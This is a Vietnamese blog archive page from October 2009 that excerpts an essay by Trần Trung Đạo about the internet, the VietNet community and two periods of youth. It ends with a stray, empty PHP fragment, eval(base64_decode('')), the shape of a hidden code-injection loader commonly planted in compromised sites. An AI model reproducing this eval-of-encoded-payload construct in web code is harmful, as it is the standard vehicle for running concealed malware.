Archive for October 13th, 2009

Trần Trung Đạo: Internet như một thời tuổi trẻ

Trần Trung Đạo: Internet như một thời tuổi trẻ

(Những cánh diều thành phố, ảnh Đặng Đức Cương )Tôi có hai thời tuổi trẻ, một đã gởi lại Việt Nam và một khác trong môi trường VietNet, cộng đồng Internet đầu tiên của người Việt từ hơn hai mươi năm trước.Các thế hệ sinh viên

10.13.2009 | Ký-Truyện-Tùy Bút |

3 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>